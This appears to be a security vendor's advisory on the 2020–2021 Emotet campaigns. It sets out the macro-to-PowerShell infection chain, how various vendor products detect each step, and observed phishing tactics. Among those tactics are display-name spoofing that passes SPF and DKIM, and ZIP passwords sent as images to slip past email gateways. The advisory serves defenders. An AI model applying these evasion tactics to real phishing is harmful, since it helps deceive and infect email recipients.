Security business menu
Security business
HOME
To be elected
cause
Service
Handling Manufacturer
Examples/reports/
Blog/Glossary
Seminar/
video on demand
Event/Seminar
video on demand

Regarding response to "Emotet" malware that has resumed activity

Release date: August 7, 2020
Last updated: January 27, 2021

A malware called Emotet has resumed its distribution activity since mid-July 2020. Many of you may already know about it, as information has been sent from multiple media and institutions.

[Reference] Regarding the resumption of email distribution activities that lead to malware Emotet infection (additional information)

In response to this situation, we would like to summarize the detection status of our products and introduce some examples that we have observed.

Emotet attack flow

We have also confirmed many attacks using Emotet, but so far, compared to the previous attack campaign that caused a lot of damage in Japan, although there are improvements in the functionality of the malware, the method itself has changed significantly. It doesn't seem like there is.

*We will update this page if any characteristic changes are confirmed in the latest attacks.

Attacks up to malware “Emotet” infection are performed in the following flow.

  • An email with an attached file is delivered *1
  • Open Office documents such as Word files attached to emails
  • Allow Macro Enabled
  • WMI *2 is executed via a macro, and PowerShell is started
  • PowerShell downloads and executes Emotet malware
  • Infected with Emotet malware

At the timing of *1, there are cases where an email with a URL link is delivered instead of an attached file. In this case, clicking on the URL in the email text will download an Office document such as a Word file.
*2 WMI = Official Windows OS management tool called Windows Management Infrastructure

Detection status in our products

The following is based on Emotet that we obtained and cases confirmed in the customer's environment, and is described in light of each step (1 to 6) of the above-mentioned Emotet attack flow.

Please note that results may change as new attack techniques emerge.

Manufacturer product name Correspondence situation
Broadcom Symantec Endpoint Protection14
  • Malicious Word files and malicious macros can be detected and quarantined with signatures
  • Even if you bypass ②, it is possible to detect and block the behavior of PowerShell acquiring files from the outside.
CrowdStrike Falcon
  • Detects and blocks malicious Word files launching PowerShell via WMI (Prevention Policy >Suspicious Behavior: Enable)
    At this time, it is also possible to display the executed Powershell command in Base64 code.
  • Even if a file is downloaded, it is analyzed by NGAV when the file is executed, and if it is determined to be malicious, it can be blocked (Prevention Policy > Next-Gen Antivirus: Moderate)
FireEye FireEye EX/ETP/NX
EX/ETP:
  • Detect and quarantine emails with attachments/URLs
NX:
  • (Pattern of e-mail with URL) If the signature matches Word file download communication, it is possible to try to prevent successful communication with a reset packet. Box can detect downloaded files with malicious macros, even if they are not blocked
  • If the signature matches the malicious file download communication by PowerShell, it is possible to try to prevent successful communication with a reset packet. Box can detect downloaded malicious files even if they are not prevented
Menlo Security Menlo Security Secure Office 365/Secure G Suite (Email isolation)
  • Since attachment files contained in emails are opened on a separate cloud, users can view them safely in a harmless state. It is also possible to prohibit the downloading of attached files and only allow viewing, or to prohibit downloading only when the security function on the cloud side determines that they are malicious.
McAfee VirusScan Enterprise
Endpoint Security
MVISION Endpoint
  • Word files can be blocked if their signatures indicate that they are malicious
  • If the downloaded file can be determined to be malicious by the signature, it can be blocked
Team T5 TeamT5 ThreatSonar (used by Mpression Cyber Security Service™ Threat Hunting & Incident Response Service)
  • Emotet malware infection can be detected by terminal memory Yara rules (APT_Emotet_Memory_Codec, etc.)

About attack emails

From here, I would like to introduce some of the email samples that we were able to observe. In the case of the reply type, the attack will be sent as a reply to the email that we actually sent. In other cases, I think that there are many subject lines related to "invoices" depending on the time of year.

Many of the attacks we received passed SPF (Sender Policy Framework), which is one of the anti-spoofing measures. Also, in order to deliver mail without delay, only the Display Name was disguised, and even if the disguised domain source set DKIM (DomainKeys Identified Mail), it did not fail and passed (for a while) In some cases, domains that do not use DKIM were signed with DKIM, and in this case DKIM failed). This display name spoofing appeared to be similar in the end of 2019 campaign.
In general, technologies such as SPF/DKIM are considered to be effective as countermeasures against spoofing, but there are cases where they are avoided in this way, so overconfidence is considered prohibited.

attachment pattern

attachment pattern

URL pattern

URL pattern

Pattern using email address as display name

Pattern using email address as display name

Examples observed since September 2020

Cases where the Japanese text is natural

In the case below, the sender part is disguised using the same method as "Pattern that uses an email address as the display name". In addition, it was devised to match the display name of the subject and the recipient.

The body of the email itself also seems to be less unnatural than the previous emails.

Cases where the Japanese text is natural

In addition to the above, we also found cases that pretended to be support satisfaction questionnaire surveys for specific products that are widely distributed in Japan.

Cases where the Japanese text is natural

It seems that the unnaturalness of Japanese is becoming more and more difficult to discern.

Do not open suspicious files, and even if they are opened, macros will not be enabled.

A case where a malicious file is delivered in a password-protected ZIP

Some emails use ZIP file password protection to deliver malicious files. In the case of this attack, it may not be detected depending on the password notation in the text and the security email gateway you are using. Please consider dealing with it in combination with monitoring at the endpoint.

A case where a malicious file is delivered in a password-protected ZIP

Cases observed since January 2021

From mid-January, activities to distribute Emotet have resumed. Below are some samples that we have confirmed. Also, I will omit the details, but the attack process has changed from the above. The main change is that Emotet, which was distributed as an .exe file, is now distributed as a .dll file.

Emails that take advantage of the declaration of a state of emergency

With the declaration of a state of emergency, emails that appear to have actually been sent by companies have been misused. It is not possible to check the incongruity in the email text itself. Therefore, it is important to check the sender's email address again. When checking, please pay attention to the "< >" in angle brackets, not the display name. The display name may pretend to be someone you do business with.

Emails that take advantage of the declaration of a state of emergency
Image password notification

There have been methods of delivering malicious files using the password protection function of ZIP files for a long time, but a method of notating the password as an image as shown below has been confirmed as a recent Emotet delivery method. . This attack may not be detected by your security email gateway. Please consider dealing with it in combination with monitoring at the endpoint.

Image password notification